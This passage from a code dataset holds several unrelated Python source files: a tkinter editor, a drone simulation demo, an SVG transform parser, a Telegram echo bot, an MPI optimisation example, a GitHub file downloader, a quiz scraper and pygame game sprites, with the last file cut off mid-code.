self.openTab(tabType=self.OPEN_NEW_DOCUMENT_TAB)\r\n\r\n    def customDialog(self, title, message, frameOrButtons, window=root):\r\n        if window == root:\r\n            cwindow = self.cwindow = tk.Toplevel(root)\r\n        cwindow.title(title)\r\n        if type(frameOrButtons) == dict:\r\n            buttons = []\r\n            for i in frameOrButtons:\r\n                buttons.append(tk.Button(cwindow, text=i, command=frameOrButtons[i]))  # pass the callback itself; calling it here would run it immediately\r\n                buttons[-1].pack()\r\n        elif isinstance(frameOrButtons, tk.Frame):\r\n            frame = frameOrButtons\r\n            frame.pack()\r\n        elif isinstance(frameOrButtons, FunctionType):\r\n            frameOrButtons(self, cwindow)\r\n\r\n    def reopenLastFile(self):\r\n        self.openFile(path=self.editor.history.pop())\r\n\r\n    def copyPath(self, tabIndex='self.editor.index(self.editor.select())'):\r\n        index = eval(tabIndex)\r\n        pyperclip.copy(self.editor.editorFiles[index])\r\n\r\n    def insertTree(self, parentId='', dicti={}):\r\n        for i in dicti:\r\n            if self.fileviewer.exists(i):\r\n                self.fileviewer.delete(i)\r\n            self.fileviewer.insert(parentId, 'end', i, text=os.path.split(i)[1])\r\n            if type(dicti[i]) == dict:\r\n                self.insertTree(i, dicti[i])\r\n\r\n    def updateFileviewer(self):\r\n        for i in self.fileviewer.tempFolders:\r\n            if self.fileviewer.exists(i):\r\n                self.fileviewer.delete(i)\r\n            self.fileviewer.insert('', 'end', i, text=os.path.basename(i)+' - '+os.path.split(i)[0])\r\n            self.insertTree(i, self.fileviewer.tempFolders[i])\r\n\r\n    def onSelect(self, event):\r\n        widget = self.winfo_containing(event.x_root, event.y_root)\r\n        if type(widget) == tk.Text:\r\n            self.updateContextMenu(self.TEXT_CONTEXT_MENU, event=event)\r\n        elif type(widget) == Editor:\r\n            if event.widget.identify(event.x, event.y) == 'label':\r\n                print(event.widget.index('@%d,%d' % (event.x, event.y)))\r\n                self.updateContextMenu(self.TAB_CONTEXT_MENU, event=event, index=event.widget.index('@%d,%d' % (event.x, event.y)))\r\n            else:\r\n                self.updateContextMenu(self.EDITOR_CONTEXT_MENU, event=event)\r\n        elif type(widget) == FileViewer:\r\n            self.fileSelect(event)\r\n\r\n    def fileSelect(self, event):\r\n        iid = self.fileviewer.identify_row(event.y)\r\n        if iid:\r\n            # mouse pointer over item\r\n            self.fileviewer.selection_set(iid)\r\n            print(iid)\r\n            if os.path.isdir(iid):\r\n                self.updateContextMenu(self.FOLDER_CONTEXT_MENU, event=event, itemId=iid)\r\n            else:\r\n                self.updateContextMenu(self.FILE_CONTEXT_MENU, event=event, itemId=iid)\r\n                # self.contextMenu.post(event.x_root, event.y_root)\r\n                print(iid)\r\n        else:\r\n            self.updateContextMenu(self.FILEVIEWER_CONTEXT_MENU, event)\r\n\r\n    def updateContextMenu(self, menuType, event, **dictargs):\r\n        menuArr = []\r\n        if self.FILE_CONTEXT_MENU == menuType:\r\n            print('hi-file')#\r\n            menuArr = [\r\n                \"\"\"\r\n                - open this file\r\n                - save file\r\n                - close\r\n                - delete\r\n                - rename file\r\n                - duplicate\r\n                - move\r\n                - new file in this directory\r\n                - ---------\r\n                - open a file\r\n                - close tab\r\n                - close window\r\n                - save\r\n                - save as\r\n                - new file\r\n                \"\"\"\r\n            ]\r\n        elif self.FOLDER_CONTEXT_MENU == menuType:\r\n            print('hi-folder')#\r\n            menuArr = []\r\n        elif self.TEXT_CONTEXT_MENU == menuType:\r\n            print('hi-text')#\r\n        elif self.TAB_CONTEXT_MENU == menuType:\r\n            print('hi-tab')#\r\n        elif self.FILEVIEWER_CONTEXT_MENU == menuType:\r\n            print('hi-fileviewer')#\r\n        elif self.EDITOR_CONTEXT_MENU == menuType:\r\n            print('hi-editor')#\r\n        self.menuFromArr(menuArr, self.contextMenu)\r\n        self.contextMenu.post(event.x_root, event.y_root)\r\n\r\n    def menuFromArr(self, arra, parent=root):\r\n        for i in arra:\r\n            if i[0] == 'command':\r\n                parent.add_command(label=i[1], 
command=i[2])\r\n            elif i[0] == 'separator':\r\n                parent.add_separator()\r\n            elif i[0] == 'cascade':\r\n                print('cascade')\r\n                cascade = tk.Menu(parent)\r\n                parent.add_cascade(menu=cascade, label=i[1])\r\n                self.menuFromArr(arra=i[2], parent=cascade)\r\n\r\n    def bindKeys(self):\r\n        root.bind('<Control-s>', lambda e : self.saveFile())\r\n        root.bind('<Control-Shift-S>', lambda e : self.saveAs())\r\n        root.bind('<Control-o>',lambda e : self.openFile())\r\n        root.bind('<Control-Shift-O>', lambda e: self.openFile(fileType=self.OPEN_FOLDER_TEMP))\r\n        root.bind('<Control-w>', lambda e : self.closeTab())\r\n        root.bind('<Control-f>', lambda e : print('f'))\r\n        \"\"\"does not work ^\"\"\"\r\n        root.bind('<Control-Shift-T>', lambda e : self.reopenLastFile())\r\n        root.bind('<Control-n>', lambda e=None : self.newFile())\r\n    # def setSideTool(self, tool=0):\r\n    #     if\r\n\r\n    # def pickColor(self):\r\n    #\r\n    # def findAndReplace(self, find, replace):\r\n    #\r\n    # def beautify(self):\r\n    #\r\n    # def calculator(self):\r\n    #\r\n    # def glossary(self):\r\n    #\r\n    # def match(self):\r\n\r\n    # def highlightText(self, event=None):\r\n    #     self.editor.tag_config('int', foreground='blue')\r\n    #     self.editor.tag_config('str', foreground='yellow')\r\n    #     self.editor.tag_config('self', foreground='red')\r\n    #     self.editor.tag_config('key word', foreground='purple')\r\n    #     self.editor.tag_config('init func', foreground='green')\r\n    #     self.editor.tag_config('class', foreground='orange')\r\n    #     keywords = kwList\r\n    #     def testInt(val):\r\n    #\r\n    #     def testStr(val):\r\n    #\r\n    #     def testBool(val):\r\n    #\r\n    #     def testKeyword(val):\r\n    #\r\n    #     def testFunc(val):\r\n    #\r\n    #     def testClass(val):\r\n    #\r\n    #     def testSelf(val):\r\n    #\r\n    #     def testParam(val):\r\n    #\r\n    #     def testComment(val):\r\n    #\r\n    #     def testPreFunc(val):\r\n    #\r\n    #\r\n    #     regDict = {\r\n    #         'int': testInt,\r\n    #         'str': testStr,\r\n    #         'bool': testBool,\r\n    #         'keyword': testKeyword,\r\n    #         'function': testFunc,\r\n    #         'class': testClass,\r\n    #         'self': testSelf,\r\n    #         'paramiter': testParam,\r\n    #         'comment': testComment,\r\n    #         'predefinedFunc': testPreFunc,\r\n    #     }\r\n    #\r\n    #     print('x')\r\n    #     cline = self.editor.index(tk.INSERT).split('.')[0]\r\nroot.geometry(\"1000x500\")\r\napp = Application(master=root)\r\n# app.bind('', app.highlightText)\r\napp.mainloop()\r\n","sub_path":"editor.py","file_name":"editor.py","file_ext":"py","file_size_in_byte":20992,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"495332855","text":"from mrsgym import *\nfrom mrsgym.Util import *\nimport gym\nimport numpy as np\n\ndef main():\n\tN = 3\n\tenv = gym.make('mrs-v0', state_fn=state_fn, N_AGENTS=1, ACTION_TYPE='set_target_ori', RETURN_EVENTS=True)\n\tactions = torch.zeros(N,3)\n\twhile True:\n\t\tX, reward, done, info = env.step(actions)\n\t\tactions = key_to_action(info[\"keyboard_events\"]).expand(N,-1)\n\t\tset_camera(env.env)\n\t\tadd_axis(env.env)\n\t\tenv.wait()\n\ndef key_to_action(keys):\n\taction = torch.zeros(3)\n\tif Key.up in keys:\n\t\taction[1] += np.pi/4\n\tif Key.down in keys:\n\t\taction[1] -= np.pi/4\n\tif Key.left in keys:\n\t\taction[0] -= np.pi/4\n\tif Key.right in keys:\n\t\taction[0] += np.pi/4\n\tif Key.space in keys:\n\t\taction[2] += np.pi/2\n\tif Key.option in keys:\n\t\taction[2] -= np.pi/2\n\treturn action\n\n\ndef state_fn(quad):\n\treturn torch.cat([quad.get_pos(), quad.get_vel()])\n\ndef set_camera(env):\n\tagent_pos = env.agents[0].get_pos()\n\tenv.set_camera(pos=agent_pos + torch.tensor([-1,0,0.5]), target=agent_pos)\n\ndef add_axis(env):\n\tagent = env.agents[0]\n\tenv.add_line(start=[0.,0.,0.], 
end=[0.2,0.,0.], parent=agent, name='agent_forward', lifetime=0.1, colour=[0.,0.,1.])\n\nif __name__ == '__main__':\n\tmain()","sub_path":"examples/env_examples/ori_control_demo.py","file_name":"ori_control_demo.py","file_ext":"py","file_size_in_byte":1151,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"341656172","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program. If not, see \n#\n# @author : pascal.fautrero@gmail.com\n\nimport re, math\n\nclass CurrentTransformation:\n    \"\"\" Used to analyze transformations applied to an SVG element\n    CTM (Current Transformation Matrix)\n    expected forms :\n    matrix(a b c d e f)\n    translate(x y)\n    translate(a)\n    scale(a)\n    scale(sx sy)\n    rotate(angle cx cy)\n    skewX(x)\n    skewY(y)\n\n    \"\"\"\n\n    def __init__(self):\n        \"\"\"Init\"\"\"\n        self.matrix = [[1.0, 0.0, 0.0], [0.0, 1.0, 0.0]]\n        self.rotate = 0\n        self.rX = 0\n        self.rY = 0\n        self.translateX = 0\n        self.translateY = 0\n        self.scaleX = 1\n        self.scaleY = 1\n\n    def print(self):\n        print(f\"rotate = {self.rotate}\")\n        print(f\"rX = {self.rX}\")\n        print(f\"rY = {self.rY}\")\n        print(f\"translateX = {self.translateX}\")\n        print(f\"translateY = {self.translateY}\")\n        print(f\"scaleX = {self.scaleX}\")\n        print(f\"scaleY = {self.scaleY}\")\n\n    def analyze(self,entry):\n        \"\"\"Analyze transform attribute\"\"\"\n        regex_group = r'([^\\s,]*)\\s*,?\\s*'\n\n        # look for something with such a form : \"matrix(a b c d e f)\"\n        regex_matrix = r'matrix\\(\\s*' + regex_group * 6 + r'\\)'\n        matchObj = re.match( regex_matrix, entry)\n        if matchObj:\n            self.extractMatrix(matchObj.groups())\n            return\n\n        # look for something with such a form : \"translate(a)\"\n        regex_translate = r'translate\\(\\s*' + regex_group * 1 + r'\\)'\n        matchObj = re.match( regex_translate, entry)\n        if matchObj:\n            self.extractTranslate(matchObj.groups())\n            return\n\n        # look for something with such a form : \"translate(a b)\"\n        regex_translate = r'translate\\(\\s*' + regex_group * 2 + r'\\)'\n        matchObj = re.match( regex_translate, entry)\n        if matchObj:\n            self.extractTranslate(matchObj.groups())\n            return\n\n        # look for something with such a form : \"rotate(a)\"\n        regex_rotate = r'rotate\\(\\s*' + regex_group * 1 + r'\\)'\n        matchObj = re.match( regex_rotate, entry)\n        if matchObj:\n            self.extractRotate(matchObj.groups())\n            return\n\n        # look for something with such a form : \"rotate(a b c)\"\n        regex_rotate = r'rotate\\(\\s*' + regex_group * 3 + r'\\)'\n        matchObj = re.match( regex_rotate, entry)\n        if matchObj:\n            self.extractRotate(matchObj.groups())\n            return\n\n        # look for something with such a form : \"scale(a)\"\n        regex_scale = r'scale\\(\\s*' + regex_group * 1 + r'\\)'\n        matchObj = re.match( regex_scale, entry)\n        if matchObj:\n            self.extractScale(matchObj.groups())\n            return\n\n        # look for something with such a form : \"scale(a b)\"\n        regex_scale = r'scale\\(\\s*' + regex_group * 2 + r'\\)'\n        matchObj = re.match( regex_scale, 
entry)\n        if matchObj:\n            self.extractScale(matchObj.groups())\n            return\n\n\n    def extractTranslate(self,groups):\n        \"\"\"extract a and b from translate(a b) pattern\"\"\"\n        self.translateX = float(groups[0])\n        # per the SVG spec, translate(a) means translate(a, 0)\n        self.translateY = 0.0\n        if len(groups) == 2 and groups[1]:\n            self.translateY = float(groups[1])\n        self.matrix = [[1.0, 0.0, self.translateX], \\\n                       [0.0, 1.0, self.translateY]]\n\n    def extractScale(self,groups):\n        \"\"\"extract a and b from scale(a b) pattern\"\"\"\n        self.scaleX = float(groups[0])\n        self.scaleY = float(groups[0])\n        if len(groups) == 2 and groups[1]:\n            self.scaleY = float(groups[1])\n        self.matrix = [[self.scaleX, 0.0, 0.0], \\\n                       [0.0, self.scaleY, 0.0]]\n\n\n    def extractRotate(self,groups):\n        \"\"\"extract a,b and c from rotate(a b c) pattern\n        cos(a) -sin(a) -cx.cos(a) + cy.sin(a) + cx\n        sin(a)  cos(a) -cx.sin(a) - cy.cos(a) + cy\n        0       0      1\n        \"\"\"\n        self.rotate = math.pi * float(groups[0]) / 180\n        self.rX = 0\n        self.rY = 0\n        if len(groups) == 3:\n            if groups[1]:\n                self.rX = float(groups[1])\n            if groups[2]:\n                self.rY = float(groups[2])\n\n        #alpha = float(self.rotate)\n        alpha = self.rotate\n        cx = self.rX\n        cy = self.rY\n        self.matrix = [ [\n                math.cos(alpha),\n                -math.sin(alpha),\n                -cx * math.cos(alpha) + cy * math.sin(alpha) + cx\n            ],\n            [\n                math.sin(alpha),\n                math.cos(alpha),\n                -cx * math.sin(alpha) - cy * math.cos(alpha) + cy\n            ]\n        ]\n\n    def extractMatrix(self,groups):\n        \"\"\"extract a,b,c,d,e,f from matrix(a b c d e f) pattern\"\"\"\n        a = float(groups[0])\n        b = float(groups[1])\n        c = float(groups[2])\n        d = float(groups[3])\n        e = float(groups[4])\n        f = float(groups[5])\n        self.matrix=[[a,c,e], [b,d,f]]\n        self.translateX = e\n        self.translateY = f\n        self.scaleX = math.sqrt(a**2+c**2)\n        self.scaleY = math.sqrt(b**2+d**2)\n        self.rotate = math.atan2(b,d)\n\n    def rectToPath(self,node):\n        \"\"\"inspired from inkscape pathmodifier.py\"\"\"\n        x = float(node['x'])\n        y = float(node['y'])\n        w = float(node['width'])\n        h = float(node['height'])\n        rx = 0\n        ry = 0\n        if 'rx' in node:\n            rx = float(node['rx'])\n        if 'ry' in node:\n            ry = float(node['ry'])\n\n        if rx==0 or ry ==0:\n            d ='M %f,%f '%(x,y)\n            d+='L %f,%f '%(x+w,y)\n            d+='L %f,%f '%(x+w,y+h)\n            d+='L %f,%f '%(x,y+h)\n            d+='L %f,%f '%(x,y)\n        else:\n            d ='M %f,%f '%(x+rx,y)\n            d+='L %f,%f '%(x+w-rx,y)\n            d+='A %f,%f 0 0 1 %f,%f'%(rx,ry,x+w,y+ry)\n            d+='L %f,%f '%(x+w,y+h-ry)\n            d+='A %f,%f 0 0 1 %f,%f'%(rx,ry,x+w-rx,y+h)\n            d+='L %f,%f '%(x+rx,y+h)\n            d+='A %f,%f 0 0 1 %f,%f'%(rx,ry,x,y+h-ry)\n            d+='L %f,%f '%(x,y+ry)\n            d+='A %f,%f 0 0 1 %f,%f'%(rx,ry,x+rx,y)\n\n        return d\n\n    def circleToPath(self,node):\n        \"\"\"inspired from inkscape pathmodifier.py\"\"\"\n        cx = float(node['cx'])\n        cy = float(node['cy'])\n        r = 0\n        if 'r' in node:\n            r = float(node['r'])\n\n        d ='M %f,%f '%(cx-r,cy)\n        d+='A %f,%f 0 0 1 %f,%f'%(r,r,cx,cy-r)\n        d+='A %f,%f 0 0 1 %f,%f'%(r,r,cx+r,cy)\n        d+='A %f,%f 0 0 1 %f,%f'%(r,r,cx,cy+r)\n        d+='A %f,%f 0 0 1 %f,%f'%(r,r,cx-r,cy)\n\n        return d\n\n    def ellipseToPath(self,node):\n        \"\"\"inspired from inkscape pathmodifier.py\"\"\"\n        cx = float(node['cx'])\n        cy = float(node['cy'])\n        rx = 0\n        ry = 0\n        if 'rx' in node:\n            rx = float(node['rx'])\n        if 'ry' in node:\n            ry = float(node['ry'])\n\n        d ='M %f,%f '%(cx-rx,cy)\n        d+='A %f,%f 0 0 1 %f,%f'%(rx,ry,cx,cy-ry)\n        d+='A %f,%f 0 0 1 %f,%f'%(rx,ry,cx+rx,cy)\n        d+='A %f,%f 0 0 1 %f,%f'%(rx,ry,cx,cy+ry)\n        d+='A %f,%f 0 0 1 %f,%f'%(rx,ry,cx-rx,cy)\n\n        return d\n\n    def inv_matrix(self):\n        a = self.matrix[0][0]\n        b = self.matrix[1][0]\n        c = self.matrix[0][1]\n        d = self.matrix[1][1]\n        e = 
self.matrix[0][2]\n        f = self.matrix[1][2]\n        delta = a*d-b*c\n        return [d/delta, (-1)*c/delta, (c*f-d*e)/delta,\n                (-1)*b/delta, a/delta, (b*e-a*f)/delta]\n\n    def applyTransformToPoint(self,mat,pt):\n        x = mat[0][0]*pt[0] + mat[0][1]*pt[1] + mat[0][2]\n        y = mat[1][0]*pt[0] + mat[1][1]*pt[1] + mat[1][2]\n        #pt[0]=x\n        #pt[1]=y\n        return x, y\n\n    def applyTransformToPath(self,mat,path):\n        for comp in path:\n            for ctl in comp:\n                for pt in ctl:\n                    pt[0], pt[1] = self.applyTransformToPoint(mat,pt)\n","sub_path":"src/xiaconverter/ctm.py","file_name":"ctm.py","file_ext":"py","file_size_in_byte":8752,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"560966287","text":"import telepot\nfrom config import TOKEN\nimport sys, time\n\nwebsite = \"https://api.telegram.org/bot\"\n\ndef pappagallo(msg):\n    content_type, chat_type, chat_id = telepot.glance(msg)\n\n    if content_type == 'text':\n        message = msg[\"from\"][\"first_name\"]\n        text = msg['text']\n\n        bot.sendMessage(chat_id, text)\n\n\nbot = telepot.Bot(TOKEN)\nbot.message_loop(pappagallo) ## message loop\n\nprint('Listening ...')\n\n# infinite loop to keep the bot alive\nwhile True:\n    time.sleep(10)\n","sub_path":"Pappagallo.py","file_name":"Pappagallo.py","file_ext":"py","file_size_in_byte":496,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"526860306","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\nThis example shows how to optimize a benchmark function in parallel using MPI.\nIn a terminal, type: mpiexec -n 4 python example_mpi.py\nComputation can be a little bit faster or slower compared with 1 process due to\ncommunication overhead. Usage of MPI is relevant only if the computation time\nof the fitness function is high.\n\nAuthor: Keurfon Luu \nLicense: MIT\n\"\"\"\n\nfrom mpi4py import MPI\nfrom time import time\ntry:\n    from stochopy import Evolutionary, BenchmarkFunction\nexcept ImportError:\n    import sys\n    sys.path.append(\"../\")\n    from stochopy import Evolutionary, BenchmarkFunction\n\n\nif __name__ == \"__main__\":\n    # Parameters\n    func = \"rastrigin\"\n    \n    # Initialize MPI\n    mpi_comm = MPI.COMM_WORLD\n    mpi_rank = mpi_comm.Get_rank()\n    \n    # Initialize function\n    bf = BenchmarkFunction(func, n_dim = 30)\n    \n    # Initialize solver\n    ea = Evolutionary(popsize = 30, max_iter = 2000, random_state = -1, mpi = True,\n                      **bf.get())\n    \n    # Solve\n    starttime = time()\n    ea.optimize(solver = \"cpso\")\n    \n    # Print solution\n    if mpi_rank == 0:\n        print(ea)\n        print(\"Elapsed time: %.2f seconds\" % (time() - starttime))","sub_path":"examples/example_mpi.py","file_name":"example_mpi.py","file_ext":"py","file_size_in_byte":1241,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"632735120","text":"#encoding: utf-8\nfrom OpenOrange import *\n\nParentCounterConcept = SuperClass(\"CounterConcept\",\"Master\",__file__)\nclass CounterConcept(ParentCounterConcept):\n    #buffer = RecordBuffer(\"CounterConcept\")\n\n    def check(self):\n        result = ParentCounterConcept.check(self)\n        if not (result): return result\n        if (not self.Account):\n            return self.FieldErrorResponse(\"NONBLANKERR\",\"Account\") \n        return result\n\n    @classmethod\n    def getConcepts(objclass,**kwargs):\n        paymodes = []\n        Account = kwargs.get(\"Account\",\"\")\n        query = Query()\n        query.sql = \"SELECT {Code} \"\n        query.sql += \"FROM [PayMode] \"\n        query.sql += \"WHERE ({Closed} = 0 OR {Closed} IS NULL) \"\n        if Account:\n            query.sql += \"AND {Account} = s|%s| \" % 
(Account)\n        if query.open():\n            for rec in query:\n                paymodes.append(rec.Code)\n        return paymodes\n","sub_path":"standard/records/CounterConcept.py","file_name":"CounterConcept.py","file_ext":"py","file_size_in_byte":925,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"461602869","text":"#!/usr/bin/env python3\n# -*- coding: UTF-8 -*-\n\nimport os\nimport sys\nimport getopt\nimport requests\nfrom lxml import etree\n\nheaders = {\n    'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36'\n}\n\ndef usage():\n    print('Usage: GitHubDown.py [-h] [--help] [-v] [--version] [--pattern=] --recur= --url=')\n    print('-h --help  : Print this information.')\n    print('--recur    : Values true or false.')\n    print('             If the directory contains subdirectories, ')\n    print('             true means download subdirectories recursively, ')\n    print('             false means only download files, not subdirectories.')\n    print('-v --version : Print version.')\n    print('--pattern  : Use a regular expression to find target files.')\n    print('--url      : Target url.')\n\ndef fileDownload(url, recur, pattern):\n    r = requests.get(url, headers=headers)\n    html = etree.HTML(r.text)\n\n    dirNode = html.xpath('//tr[@class=\"js-navigation-item\"]/td[@class=\"icon\"]/svg[@aria-label=\"directory\"]')\n    dirNum = len(dirNode)\n\n    nodeName = html.xpath('//tr[@class=\"js-navigation-item\"]/td[@class=\"content\"]/span/a/text()')\n    print(nodeName)\n    print(len(nodeName))\n    \n    nodeUrl = html.xpath('//tr[@class=\"js-navigation-item\"]/td[@class=\"content\"]/span/a/@href')\n    print(nodeUrl)\n    print(len(nodeUrl))\n    \n    #Find the gray words and add them to nodename\n    for i in range(1, dirNum+1):\n        t = html.xpath('//tr[@class=\"js-navigation-item\"][' + str(i) + ']/td[@class=\"content\"]/span/a/span/text()')\n        if len(t):\n            nodeName[i-1] = t[0] + nodeName[i-1]\n    \n    if recur:\n        for i in range(0, dirNum):\n            os.mkdir('./'+nodeName[i])\n            print('Make Dir: ' + os.getcwd())\n            os.chdir(os.getcwd() +'/' + nodeName[i])\n            print('Change Dir: ' + os.getcwd())\n            fileDownload(\"https://github.com\" + nodeUrl[i], recur, pattern)\n            os.chdir('./..')\n            print('Out Dir: ' + os.getcwd())\n    \n\n    for i in range(dirNum, len(nodeName)):\n        # fetch the raw file content and save it locally; GitHub serves raw files when /blob/ is replaced by /raw/\n        r = requests.get(\"https://github.com\" + nodeUrl[i].replace('/blob/', '/raw/'), headers=headers)\n        with open(nodeName[i], 'wb') as fo:\n            fo.write(r.content)\n\n\ndef main():\n    try:\n        opts, args = getopt.getopt(sys.argv[1:], 'hv', ['help', 'version', 'recur=', 'url=', 'pattern='])\n    except getopt.GetoptError as err:\n        print(err)\n        usage()\n        sys.exit(2)\n\n    url = None\n    recur = None\n    pattern = None\n    \n    for opt, arg in opts:\n        if opt in ('-h', '--help'):\n            usage()\n            sys.exit(0)\n        elif opt in ('-v', '--version'):\n            print('GitHubDown version 0.01')\n            sys.exit(0)\n        elif opt == '--recur':\n            if arg == 'true':\n                recur = True\n            elif arg == 'false':\n                recur = False\n            else:\n                print('Error: --recur option values true or false !')\n        elif opt == '--url':\n            url = arg\n        elif opt == '--pattern':\n            pattern = arg\n\n    if recur is None or url is None:\n        print('option --recur and --url is necessary! 
Use -h or --help to get more information.')\n        sys.exit(2)\n\n    outDir = \"GitHubDown\"\n    os.mkdir('./' + outDir)\n    os.chdir(os.getcwd() + '/' + outDir)\n    print('out the fileDownload:')\n    print(os.getcwd())\n    fileDownload(url, recur, pattern)\n\n\nif __name__ == \"__main__\":\n    main()\n","sub_path":"GitHubDown.py","file_name":"GitHubDown.py","file_ext":"py","file_size_in_byte":3422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"614716950","text":"#!/usr/bin/env python3\n\nimport urllib.request\nfrom bs4 import BeautifulSoup\nimport time\n\ndef get_html(url):\n\tresponse = urllib.request.urlopen(url)\n\treturn response.read()\n\ndef parse(html):\n\tsoup = BeautifulSoup(html, 'html.parser')\n\ttable = soup.find('div', class_='main')\n\n\tquests = []\n\n\tarr = table.find_all('div', class_='content')\n\n\tfor elem in arr: \n\n\t\tfor chs in elem.find_all('div', class_='header'):\n\t\t\tquests.append(\n\t\t\t\t\"]\\n},\\n{\\nquest: '\" + chs.text + \"',\\nanswers:[\\n\"\n\t\t\t)\n\n\t\tfor chs in elem.find_all('div', class_='item'):\n\t\t\tif chs.find('div', class_='correct'): \n\t\t\t\tquests.append(\n\t\t\t\t\t\"\\t{\\n\\t\\tanswer: '\" + chs.text + \"',\\n\"\n\t\t\t\t\t\"\\t\\tcorrect: \" + str(1) + \"\\n\\t},\\n\"\n\t\t\t\t)\n\t\t\telse:\n\t\t\t\tquests.append(\n\t\t\t\t\t\"\\t{\\n\\t\\tanswer: '\" + chs.text + \"',\\n\"\n\t\t\t\t\t\"\\t\\tcorrect: \" + str(0) + \"\\n\\t},\\n\"\n\t\t\t\t)\n\t\t\t# if elem.find_all('div', class_='item'):\n\t\t# quests.append(\"\\n]}\\n\")\n\n\n\n\n\n\twith open('acc_array.js', 'w', encoding='utf8') as f:\n\n\t\tfor quest in quests:\n\t\t\tf.write(quest)\n\n\n\n\ndef main():\n\tparse(get_html('file:///T:/1es/edu/acc_prof/acc_test.html'))\n\nif __name__ == '__main__':\n\tmain()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1079,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"314092783","text":"import os\nimport random\n\nimport pygame\n\nfrom config import Config\n\n\nclass SpritePlayerSpaceship(pygame.sprite.Sprite):\n    \"\"\"Player ship sprite\"\"\"\n    def __init__(self):\n        pygame.sprite.Sprite.__init__(self)\n        player_img = pygame.image.load(os.path.join(Config.IMG_FOLDER, 'spaceship.png'))\n        player_img = pygame.transform.scale(player_img, (120, 120))\n        self.image = player_img.convert_alpha()\n        self.rect = self.image.get_rect(center=(Config.SPRITE_PLAYER_SPACESHIP_INIT_X,\n                                                Config.SPRITE_PLAYER_SPACESHIP_INIT_Y))\n        self.radius = int(self.rect.width / 2)\n\n\nclass SpriteMeteorite(pygame.sprite.Sprite):\n    \"\"\"Meteorite sprites\"\"\"\n    def __init__(self):\n        pygame.sprite.Sprite.__init__(self)\n        all_sprites = [file_name for file_name in os.listdir(Config.IMG_FOLDER) if 'meteorite' in file_name]\n        random_sprite = random.choice(all_sprites)\n        random_size = random.randrange(50, 101)\n\n        image = pygame.image.load(os.path.join(Config.IMG_FOLDER, random_sprite))\n        image = pygame.transform.scale(image, (random_size, random_size))  # apply a random size\n        image = pygame.transform.rotate(image, random.randrange(360))  # apply a random rotation\n        self.image = image.convert_alpha()\n        self.rect = self.image.get_rect(center=(random.randint(0, Config.WIDTH), random.randint(-Config.HEIGHT, 0)))\n        self.radius = int(self.rect.width * 0.6 / 2)\n\n\nclass SpriteBackGround(pygame.sprite.Sprite):\n    \"\"\"background sprite\"\"\"\n    def __init__(self):\n        pygame.sprite.Sprite.__init__(self)\n        background_img = pygame.image.load(os.path.join(Config.IMG_FOLDER, 
'background.jpg'))\n        background_img = pygame.transform.scale(background_img, (Config.WIDTH, Config.HEIGHT))\n        self.image = background_img.convert()\n        self.rect = self.image.get_rect()\n\n\nclass SpriteStartMenu(pygame.sprite.Sprite):\n    \"\"\"start menu sprite\"\"\"\n    def __init__(self):\n        pygame.sprite.Sprite.__init__(self)\n        start_menu_img = pygame.image.load(os.path.join(Config.IMG_FOLDER, 'start_menu.png'))\n        start_menu_img = pygame.transform.scale(start_menu_img, (Config.WIDTH // 2, Config.HEIGHT // 2))\n        self.image = start_menu_img.convert()\n        self.rect = self.image.get_rect()\n\n\nclass SpriteLaser(pygame.sprite.Sprite):\n    \"\"\"Laser sprite for the ship's attack\"\"\"\n    def __init__(self, x, y):\n        pygame.sprite.Sprite.__init__(self)\n        laser_img = pygame.image.load(os.path.join(Config.IMG_FOLDER, 'laser.png'))\n        laser_img = pygame.transform.scale(laser_img, (20, 50))\n        self.image = laser_img.convert_alpha()\n        self.rect = self.image.get_rect()\n        self.rect.bottom = y\n        self.rect.centerx = x\n        self.speedy = -10\n\n    def update(self):\n        self.rect.y += self.speedy\n        # kill it once it moves past the top of the screen\n        if self.rect.bottom < 0:\n            self.kill()\n\n\nclass SpriteHealthPoints(pygame.sprite.Sprite):\n    \"\"\"Health points sprite\"\"\"\n    def __init__(self, x):\n        pygame.sprite.Sprite.__init__(self)\n        health_img = pygame.image.load(os.path.join(Config.IMG_FOLDER, 'hp.png'))\n        health_img = pygame.transform.scale(health_img, (Config.SPRITE_HEALTH_POINTS_SIZE[0],\n                                                         Config.SPRITE_HEALTH_POINTS_SIZE[1]))\n        self.image = health_img.convert_alpha()\n        self.rect = self.image.get_rect()\n        self.rect.centerx = x\n\n\nclass SpriteHealthRecovery(pygame.sprite.Sprite):\n    \"\"\"Health-recovery buff sprite\"\"\"\n    def __init__(self, center):\n        pygame.sprite.Sprite.__init__(self)\n        healthrecovery_img = pygame.image.load(os.path.join(Config.IMG_FOLDER, 'health_recovery.png'))\n        healthrecovery_img = pygame.transform.scale(healthrecovery_img, (35, 35))\n        self.image = healthrecovery_img.convert_alpha()\n        self.rect = self.image.get_rect()\n        self.radius = int(self.rect.width / 2)\n        self.rect.center = center\n\n\nclass SpriteWeaponUpgrade(pygame.sprite.Sprite):\n    \"\"\"Attack-speed (weapon upgrade) buff sprite\"\"\"\n    def __init__(self, center):\n        pygame.sprite.Sprite.__init__(self)\n        weapon_upgrade_img = pygame.image.load(os.path.join(Config.IMG_FOLDER, 'weapon_upgrade.png'))\n        